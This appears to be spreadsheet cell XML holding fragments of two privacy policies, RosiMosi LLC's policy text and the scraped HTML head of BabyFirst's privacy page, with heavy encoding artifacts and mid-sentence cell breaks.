        &gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t>We only share and disclose your information with the following third_x005F_x000D_
        parties. We have categorized each party so that you may be easily_x005F_x000D_
        understand the purpose of our data collection and processing practices._x005F_x000D_
        If we have processed your data based on your consent and you wish to_x005F_x000D_
        revoke your consent, please contact us._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - Allow Users to Connect to their Third-Party Accounts: Facebook_x005F_x000D_
        account, Twitter account and Google account_x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        - Invoice and Billing: Stripe_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - Web and Mobile Analytics: Google Analytics_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;5.</t>
  </si>
  <si>
    <t>DO WE USE COOKIES AND OTHER TRACKING TECHNOLOGIES?&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;em_x005F_x000D_
          &gt; In Short: We may use cookies and other tracking technologies to_x005F_x000D_
          collect and store your information.&lt;/em_x005F_x000D_
        &gt;_x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
         We may use cookies and similar tracking technologies (like web beacons_x005F_x000D_
        and pixels) to access or store information._x005F_x000D_
_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;6.</t>
  </si>
  <si>
    <t>HOW DO WE HANDLE YOUR SOCIAL LOGINS?&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;em_x005F_x000D_
          &gt; In Short: If you choose to register or log in to our services using a_x005F_x000D_
          social media account, we may have access to certain information about_x005F_x000D_
          you.&lt;/em_x005F_x000D_
        &gt;_x005F_x000D_
        &lt;br</t>
  </si>
  <si>
    <t>/&gt;&lt;br /&gt;_x005F_x000D_
         Our Services offer you the ability to register and login using your_x005F_x000D_
        third party social media account details (like your Facebook or Twitter_x005F_x000D_
        logins).</t>
  </si>
  <si>
    <t xml:space="preserve">Where you choose to do this, we will receive certain profile_x005F_x000D_
        information about you from your social media provider. The profile_x005F_x000D_
        Information we receive may vary depending on the social media provider_x005F_x000D_
        concerned, but will often include your name, e-mail address, friends_x005F_x000D_
        list, profile picture as well as other information you choose to make_x005F_x000D_
        public._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t>We will use the information we receive only for the purposes that are_x005F_x000D_
        described in this privacy policy or that are otherwise made clear to you_x005F_x000D_
        on the Services . Please note that we do not control, and are not_x005F_x000D_
        responsible for, other uses of your personal information by your third_x005F_x000D_
        party social media provider. We recommend that you review their privacy_x005F_x000D_
        policy to understand how they collect, use and share your personal_x005F_x000D_
        information, and how you can set your privacy preferences on their sites_x005F_x000D_
        and apps._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;7. IS YOUR INFORMATION TRANSFERRED INTERNATIONALLY?&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;em_x005F_x000D_
          &gt;</t>
  </si>
  <si>
    <t xml:space="preserve">In Short: We may transfer, store, and process your information in_x005F_x000D_
          countries other than your own.&lt;/em_x005F_x000D_
        &gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t xml:space="preserve">Our servers are located in United States. If you are accessing our_x005F_x000D_
        Services from outside United States, please be aware that your_x005F_x000D_
        information may be transferred to, stored, and processed by us in our_x005F_x000D_
        facilities and by those third parties with whom we may share your_x005F_x000D_
        personal information (see " WILL YOUR INFORMATION BE SHARED WITH ANYONE?_x005F_x000D_
        " above), in and other countries._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t>If you are a resident in the European Economic Area, then these_x005F_x000D_
        countries may not have data protection or other laws as comprehensive as_x005F_x000D_
        those in your country. We will however take all necessary measures to_x005F_x000D_
        protect your personal information in accordance with this privacy policy_x005F_x000D_
        and applicable law._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
_x005F_x000D_
        8.</t>
  </si>
  <si>
    <t>HOW LONG DO WE KEEP YOUR INFORMATION?_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;em_x005F_x000D_
          &gt; In Short: We keep your information for as long as necessary to_x005F_x000D_
          fulfill the purposes outlined in this privacy policy unless otherwise_x005F_x000D_
          required by law.&lt;/em_x005F_x000D_
        &gt;_</t>
  </si>
  <si>
    <t>x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
         We will only keep your personal information for as long as it is_x005F_x000D_
        necessary for the purposes set out in this privacy policy, unless a_x005F_x000D_
        longer retention period is required or permitted by law (such as tax,_x005F_x000D_
        accounting or other legal requirements).</t>
  </si>
  <si>
    <t>No purpose in this policy will_x005F_x000D_
        require us keeping your personal information for longer than 2 years_x005F_x000D_
        past the termination of the user's account ._x000D _
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
         When we have no ongoing legitimate business need to process your_x005F_x000D_
        personal information, we will either delete or anonymize it, or, if this_x005F_x000D_
        is not possible (for example, because your personal information has been_x005F_x000D_
        stored in backup archives), then we will securely store your personal_x005F_x000D_
        information and isolate it from any further processing until deletion is_x005F_x000D_
        possible._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;9.</t>
  </si>
  <si>
    <t>HOW DO WE KEEP YOUR INFORMATION SAFE?&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;em_x005F_x000D_
          &gt; In Short: We aim to protect your personal information through a_x005F_x000D_
          system of organizational and technical security measures.&lt;/em_x005F_x000D_
        &gt;_</t>
  </si>
  <si>
    <t>x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
         We have implemented appropriate technical and organizational security_x005F_x000D_
        measures designed to protect the security of any personal information we_x005F_x000D_
        process.</t>
  </si>
  <si>
    <t>However, please also remember that we cannot guarantee that the_x005F_x000D_
        internet itself is 100% secure. Although we will do our best to protect_x005F_x000D_
        your personal information, transmission of personal information to and_x005F_x000D_
        from our Services is at your own risk. You should only access the_x005F_x000D_
        services within a secure environment._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;10. WHAT ARE YOUR PRIVACY RIGHTS?&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;em_x005F_x000D_
          &gt;</t>
  </si>
  <si>
    <t xml:space="preserve">In Short: In some regions, such as the European Economic Area, you_x005F_x000D_
          have rights that allow you greater access to and control over your_x005F_x000D_
          personal information. You may review, change, or terminate your_x005F_x000D_
          account at any time.&lt;/em_x005F_x000D_
        &gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t>In some regions (like the European Economic Area), you have certain_x005F_x000D_
        rights under applicable data protection laws. These may include the_x005F_x000D_
        right (i) to request access and obtain a copy of your personal_x005F_x000D_
        information, (ii) to request rectification or erasure; (iii) to restrict_x005F_x000D_
        the processing of your personal information; and (iv) if applicable, to_x005F_x000D_
        data portability. In certain circumstances, you may also have the right_x005F_x000D_
        to object to the processing of your personal information.</t>
  </si>
  <si>
    <t xml:space="preserve">To make such a_x005F_x000D_
        request, please use the contact details provided below. We will consider_x005F_x000D_
        and act upon any request in accordance with applicable data protection_x005F_x000D_
        laws._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t xml:space="preserve">If we are relying on your consent to process your personal information,_x005F_x000D_
        you have the right to withdraw your consent at any time. Please note_x005F_x000D_
        however that this will not affect the lawfulness of the processing_x005F_x000D_
        before its withdrawal._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t xml:space="preserve">If you are resident in the European Economic Area and you believe we are_x005F_x000D_
        unlawfully processing your personal information, you also have the right_x005F_x000D_
        to complain to your local data protection supervisory authority. You can_x005F_x000D_
        find their contact details here:_x005F_x000D_
        http://ec.europa.eu/justice/data-protection/bodies/authorities/index_en.htm._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t xml:space="preserve">If you have questions or comments about your privacy rights, you may_x005F_x000D_
        email us at help@rosimosi.com._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;Account Information&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t xml:space="preserve">If you would at any time like to review or change the information in_x005F_x000D_
        your account or terminate your account, you can:_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        - Contact us using the contact information provided._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t>Upon your request to terminate your account, we will deactivate or_x005F_x000D_
        delete your account and information from our active databases. However,_x005F_x000D_
         some information may be retained in our files to prevent fraud,_x005F_x000D_
        troubleshoot problems, assist with any investigations, enforce our Terms_x005F_x000D_
        of Use and/or comply with legal requirements._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        Cookies and similar technologies: Most Web browsers are set to accept_x005F_x000D_
        cookies by default. If you prefer, you can usually choose to set your_x005F_x000D_
        browser to remove cookies and to reject cookies.</t>
  </si>
  <si>
    <t>If you choose to remove_x005F_x000D_
        cookies or reject cookies, this could affect certain features or_x005F_x000D_
        services of our Services._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        Opting out of email marketing: You can unsubscribe from our marketing_x005F_x000D_
        email list at any time by clicking on the unsubscribe link in the emails_x005F_x000D_
        that we send or by contacting us using the details provided below. You_x005F_x000D_
        will then be removed from the marketing email list – however, we will_x005F_x000D_
        still need to send you service-related emails that are necessary for the_x005F_x000D_
        administration and use of your account._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t xml:space="preserve">/&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;11. DATA BREACH&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        </t>
  </si>
  <si>
    <t>A privacy breach occurs when there is unauthorized access to or_x005F_x000D_
        collection, use, disclosure or disposal of personal information. You_x005F_x000D_
        will be notified about data breaches when RosiMosi LLC believes you are_x005F_x000D_
        likely to be at risk or serious harm. For example, a data breach may be_x005F_x000D_
        likely to result in serious financial harm or harm to your mental or_x005F_x000D_
        physical well-being.</t>
  </si>
  <si>
    <t>In the event that RosiMosi LLC becomes aware of a_x005F_x000D_
        security breach which has resulted or may result in unauthorized access,_x005F_x000D_
        use or disclosure of personal information RosiMosi LLC will promptly_x005F_x000D_
        investigate the matter and notify the applicable Supervisory Authority_x005F_x000D_
        not later than 72 hours after having become aware of it, unless the_x005F_x000D_
        personal data breach is unlikely to result in a risk to the rights and_x005F_x000D_
        freedoms of natural persons._x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;12. CONTROLS FOR DO-NOT-TRACK FEATURES&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        Most web browsers and some mobile operating systems and mobile_x005F_x000D_
        applications include a Do-Not-Track (“DNT”) feature or setting you can_x005F_x000D_
        activate to signal your privacy preference not to have data about your_x005F_x000D_
        online browsing activities monitored and collected. No uniform_x005F_x000D_
        technology standard for recognizing and implementing DNT signals has_x005F_x000D_
        been finalized. As such, we do not currently respond to DNT browser_x005F_x000D_
        signals or any other mechanism that automatically communicates your_x005F_x000D_
        choice not to be tracked online.</t>
  </si>
  <si>
    <t>If a standard for online tracking is_x005F_x000D_
        adopted that we must follow in the future, we will inform you about that_x005F_x000D_
        practice in a revised version of this privacy policy ._x000D _
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
_x005F_x000D_
        &lt;b&gt;13. DO CALIFORNIA RESIDENTS HAVE SPECIFIC PRIVACY RIGHTS?&lt;/b&gt;_x005F_x000D_
        &lt;em_x005F_x000D_
          &gt; In Short: Yes, if you are a resident of California, you are granted_x005F_x000D_
          specific rights regarding access to your personal information.&lt;/em_x005F_x000D_
        &gt;_x005F_x000D_
        &lt;br</t>
  </si>
  <si>
    <t>/&gt;&lt;br /&gt;_x005F_x000D_
        California Civil Code Section 1798.83, also known as the “Shine The_x005F_x000D_
        Light” law, permits our users who are California residents to request_x005F_x000D_
        and obtain from us, once a year and free of charge, information about_x005F_x000D_
        categories of personal information (if any) we disclosed to third_x005F_x000D_
        parties for direct marketing purposes and the names and addresses of all_x005F_x000D_
        third parties with which we shared personal information in the_x005F_x000D_
        immediately preceding calendar year. If you are a California resident_x005F_x000D_
        and would like to make such a request, please submit your request in_x005F_x000D_
        writing to us using the contact information provided below._x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
         If you are under 18 years of age, reside in California, and have a_x005F_x000D_
        registered account with the Services, you have the right to request_x005F_x000D_
        removal of unwanted data that you publicly post on the Services. To_x005F_x000D_
        request removal of such data, please contact us using the contact_x005F_x000D_
        information provided below, and include the email address associated_x005F_x000D_
        with your account and a statement that you reside in California.</t>
  </si>
  <si>
    <t>We will_x005F_x000D_
        make sure the data is not publicly displayed on the Services, but please_x005F_x000D_
        be aware that the data may not be completely or comprehensively removed_x005F_x000D_
        from our systems._x005F_x000D_
_x005F_x000D_
        &lt;br /&gt;&lt;br /&gt;_x005F_x000D_
        &lt;b&gt;14. DO WE MAKE UPDATES TO THIS POLICY?&lt;/b&gt;_x005F_x000D_
        &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
        &lt;em_x005F_x000D_
          &gt; In Short: Yes, we will update this policy as necessary to stay_x005F_x000D_
          compliant with re</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html class="avada-html-layout-wide avada-html-header-position-top avada-header-color-not-opaque" lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"&gt;
&lt;head&gt;
	&lt;meta http-equiv="X-UA-Compatible" content="IE=edge" /&gt;
	&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"/&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1" /&gt;
	&lt;! -- This site is optimized with the Yoast SEO plugin v16.7 - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;Privacy Policy - BabyFirst&lt;/title&gt;
	&lt;meta name="robots" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" /&gt;
	&lt;link rel="canonical" href="https://www.babyfirsttv.com/privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy - BabyFirst" /&gt;
	&lt;meta property="og:url" content="https://www.babyfirsttv.com/privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="BabyFirst" /&gt;
	&lt;meta property="article:modified_time" content="2021-03-24T14:33:52+00:00" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
	&lt;meta name="twitter:data1" content="25 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.babyfirsttv.com/#website","url":"https://www.babyfirsttv.com/","name":"BabyFirst","description":"Watch Your Baby Blossom","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.babyfirsttv.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://www.babyfirsttv.com/privacy-policy/#webpage","url":"https://www.babyfirsttv.com/privacy-policy/","name":"Privacy Policy - BabyFirst","isPartOf":{"@id":"https://www.babyfirsttv.com/#website"},"datePublished":"2017-02-09T09:09:36+00:00","dateModified":"2021-03-24T14:33:52+00:00","breadcrumb":{"@id":"https://www.babyfirsttv.com/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.babyfirsttv.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://www.babyfirsttv.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.babyfirsttv.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]}]}&lt;/script&gt;
	&lt;!--</t>
  </si>
  <si>
    <t>/ Yoast SEO plugin. --&gt;
&lt;link rel='dns-prefetch' href='//www.google.com' /&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="BabyFirst &amp;raquo; Feed" href="https://www.babyfirsttv.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="BabyFirst &amp;raquo; Comments Feed" href="https://www.babyfirsttv.com/comments/feed/" /&gt;
					&lt;link rel="shortcut icon" href="http://www.babyfirsttv.com/wp-content/uploads/2019/09/Logo-2D-16.png" type="image/x-icon" /&gt;
					&lt;!-- For iPhone --&gt;
			&lt;link rel="apple-touch-icon" href="http://www.babyfirsttv.com/wp-content/uploads/2019/09/Logo-2D-57.png"&gt;
					&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">For iPhone Retina display --&gt;
			&lt;link rel="apple-touch-icon" sizes="114x114" href="http://www.babyfirsttv.com/wp-content/uploads/2019/09/Logo-2D-114.png"&gt;
					&lt;!-- For iPad --&gt;
			&lt;link rel="apple-touch-icon" sizes="72x72" href="http://www.babyfirsttv.com/wp-content/uploads/2019/09/Logo-2D-72.png"&gt;
					&lt;!-- For iPad Retina display --&gt;
			&lt;link rel="apple-touch-icon" sizes="144x144" href="http://www.babyfirsttv.com/wp-content/uploads/2019/09/Logo-2D-144.png"&gt;
		&lt;meta property="og:title" content="Privacy Policy"/&gt;
		&lt;meta property="og:type" content="article"/&gt;
		&lt;meta property="og:url" content="https://www.babyfirsttv.com/privacy-policy/"/&gt;
		&lt;meta property="og:site_name" content="BabyFirst"/&gt;
		&lt;meta property="og:description" content="BFTV Privacy Policy/California Privacy Rights_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Last Updated: March 11th, 2021 _x005F_x000D_
_x005F_x000D_
 	 What is this document?_x005F_x000D_
_x005F_x000D_
 	</t>
  </si>
  <si>
    <t>This document explains what information we collect or receive from you when you or your child uses any of the BFTV Services, online-services or Apps ( together, “the"/&gt;
									&lt;meta property="og:image" content="https://www.babyfirsttv.com/wp-content/uploads/2019/10/babyfirst_logo_2019_300px-e1570008215346.png"/&gt;
									&lt;script type="text/javascript"&gt;
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.babyfirsttv.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.6.10"}};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[55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}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t>
  </si>
  <si>
    <t>important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='sbi_styles-css'  href='http://www.babyfirsttv.com/wp-content/plugins/instagram-feed-pro/css/sbi-styles.min.css?ver=5.11.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='rs-plugin-settings-css'  href='http://www.babyfirsttv.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.2.2' type='text/css' media='all' /&gt;
&lt;style id='rs-plugin-settings-inline-css' type='text/css'&gt;
#rs-demo-id {}
&lt;/style&gt;
&lt;link rel='stylesheet' id='ewd-ufaq-style-css'  href='http://www.babyfirsttv.com/wp-content/plugins/ultimate-faqs/css/ewd-ufaq-styles.css?ver=5.6.10' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='ewd-ufaq-rrssb-css'  href='http://www.babyfirsttv.com/wp-content/plugins/ultimate-faqs/css/rrssb-min.css?ver=5.6.10' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wpml-menu-item-0-css'  href='//www.babyfirsttv.com/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/menu-item/style.css?ver=1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='avada-parent-stylesheet-css'  href='http://www.babyfirsttv.com/wp-content/themes/Avada/style.css?ver=5.6.10' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='child-style-css'  href='http://www.babyfirsttv.com/wp-content/themes/babyfirsttv-Theme/style.css?ver=5.6.10' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='fusion-custom-icons-41-css'  href='https://www.babyfirsttv.com/wp-content/uploads/fusion-icons/21-v1.0-7/style.css?ver=2.2.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='avada-stylesheet-css'  href='http://www.babyfirsttv.com/wp-content/themes/Avada/assets/css/style.min.css?ver=6.2.2' type='text/css' media='all' /&gt;
&lt;!--[if IE]&gt;
&lt;link rel='stylesheet' id='avada-IE-css'  href='http://www.babyfirsttv.com/wp-content/themes/Avada/assets/css/ie.min.css?ver=6.2.2' type='text/css' media='all' /&gt;
&lt;style id='avada-IE-inline-css' type='text/css'&gt;
.avada-select-parent .select-arrow{background-color:#ffffff}
.select-arrow{background-color:#ffffff}
&lt;/style&gt;
&lt;! [endif]--&gt;
&lt;link rel='stylesheet' id='simple-social-icons-font-css'  href='http://www.babyfirsttv.com/wp-content/plugins/simple-social-icons/css/style.css?ver=3.0.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cf7cf-style-css'  href='http://www.babyfirsttv.com/wp-content/plugins/cf7-conditional-fields/style.css?ver=5' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='http://www.babyfirsttv.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.babyfirsttv.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.babyfirsttv.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.0' id='tp-tools-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.babyfirsttv.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.2.2' id='revmin-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.babyfirsttv.com/wp-content/plugins/simple-social-icons/svgxuse.js?ver=1.1.21' id='svg-x-use-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://www.babyfirsttv.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://www.babyfirsttv.com/wp-json/wp/v2/pages/752" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.babyfirsttv.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.babyfirsttv.com/wp-includes/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 5.6.10" /&gt;
&lt;link rel='shortlink' href='https://www.babyfirsttv.com/?p=752' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://www.babyfirsttv.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.babyfirsttv.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://www.babyfirsttv.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.babyfirsttv.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;meta name="generator" content="WPML ver:4.3.15 stt:1,2;" /&gt;
    &lt;script type="text/javascript"&gt;_x005F_x000D_
        var ajaxurl = 'https://www.babyfirsttv.com/wp-admin/admin-ajax.php';_x005F_x000D_
    &lt;/script&gt;_x005F_x000D_
&lt;style type="text/css" id="css-fb-visibility"&gt;@media screen and (max-width: 920px){body:not(.fusion-builder-ui-wireframe) .fusion-no-small-visibility{display:none ! important;}}@media screen and (min-width: 921px) and (max-width: 1080px){body:not(.fusion-builder-ui-wireframe) .fusion-no-medium-visibility{display:none ! important;}}@media screen and (min-width: 1081px){body:not(.fusion-builder-ui-wireframe) .fusion-no-large-visibility{display:none !</t>
  </si>
  <si>
    <t>important;}}&lt;/style&gt;&lt;meta name="generator" content="Powered by Slider Revolution 6.2.2 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /&gt;
&lt;script type="text/javascript" async _x005F_x000D_
 src="https://static.klaviyo.com/onsite/js/klaviyo.js?company_id=TrxXsk"&gt;&lt;/script&gt;_x005F_x000D_
&lt;meta name="p:domain_verify" content="25ecd5480f7da45d9175b9f1c7dbad0b"/&gt;&lt;script type="text/javascript"&gt;function setREVStartSize(e){			_x005F_x000D_
			try {								_x005F_x000D_
				var pw = document.getElementById(e.c).parentNode.offsetWidth,_x005F_x000D_
					newh;_x005F_x000D_
				pw = pw===0 || isNaN(pw) ?</t>
  </si>
  <si>
    <t>window.innerWidth : pw;_x005F_x000D_
				e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw);_x005F_x000D_
				e.thumbw = e.thumbw===undefined ? 0 : parseInt(e.thumbw);_x005F_x000D_
				e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh);_x005F_x000D_
				e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh);_x005F_x000D_
				e.tabhide = e.tabhide===undefined ? 0 : parseInt(e.tabhide);_x005F_x000D_
				e.thumbhide = e.thumbhide===undefined ? 0</t>
  </si>
  <si>
    <t>: parseInt(e.thumbhide);_x005F_x000D_
				e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0);		_x005F_x000D_
				if(e.layout==="fullscreen" || e.l==="fullscreen") 						_ x000D_
					newh = Math.max(e.mh,window.innerHeight);				_x005F_x000D_
				else{					_x005F_x000D_
					e.gw = Array.isArray(e.gw) ? e.gw :</t>
  </si>
  <si>
    <t>[e.gw];_x005F_x000D_
					for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1];					_x005F_x000D_
					e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) &amp;&amp; e.el.length==0)? e.gh : e.el;_x005F_x000D_
					e.gh = Array.isArray(e.gh) ? e.gh :</t>
  </si>
  <si>
    <t>[e.gh];_x005F_x000D_
					for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1];_x005F_x000D_
										_x005F_x000D_
					var nl = new Array(e.rl.length),_x005F_x000D_
						ix = 0,						_x005F_x000D_
						sl;					_x005F_x000D_
					 e.tabw = e.tabhide&gt;=pw ? 0</t>
  </si>
  <si>
    <t>: e.tabw;_x005F_x000D_
					e.thumbw = e.thumbhide&gt;=pw ? 0 : e.thumbw;_x005F_x000D_
					e.tabh = e.tabhide&gt;=pw ? 0</t>
  </si>
  <si>
    <t>: e.tabh;_x005F_x000D_
					e.thumbh = e.thumbhide&gt;=pw ? 0 : e.thumbh;					_x005F_x000D_
					for (var i in e.rl) nl[i] = e.rl[i]&lt;window.innerWidth ? 0 : e.rl[i];_x005F_x000D_
					sl = nl[0];									_x005F_x000D_
					for (var i in nl) if (sl&gt;nl[i] &amp;&amp; nl[i]&gt;0) { sl = nl[i]; ix=i;}															_x005F_x000D_
					var m</t>
  </si>
  <si>
    <t xml:space="preserve">e.gh[ix] : (e.gh[ix] * m)) + (e.tabh + e.thumbh);_x005F_x000D_
				}			_x005F_x000D_
				_x005F_x000D_
				if(window.rs_init_css===undefined) window.rs_init_css = document.head.appendChild(document.createElement("style"));					_x005F_x000D_
				</t>
  </si>
  <si>
    <t>document.getElementById(e.c).height = newh;_x005F_x000D_
				window.rs_init_css.innerHTML += "#"+e.c+"_wrapper { height: "+newh+"px }";				_x005F_x000D_
			} catch(e){_x005F_x000D_
				console.log("Failure at Presize of Slider:" + e)_x005F_x000D_
			}					   _x005F_x000D_
		  };&lt;/script&gt;
		&lt;style type="text/css" id="wp-custom-css"&gt;
			.tfs-button-1{position: relative; left:80%; bottom:-250% !important;}
/*Contact</t>
  </si>
  <si>
    <t>Form 7 Styles */
.wpcf7-submit {
	background: #4677ff;
	color: #4677ff;
}		&lt;/style&gt;
		&lt;style id="fusion-stylesheet-inline-css" type="text/css"&gt;/********* Compiled CSS - Do not edit *********/ :root{--button_padding:11px 23px;--button_font_size:13px;--button_line_height:16px;}/* cyrillic-ext */
@font-face {
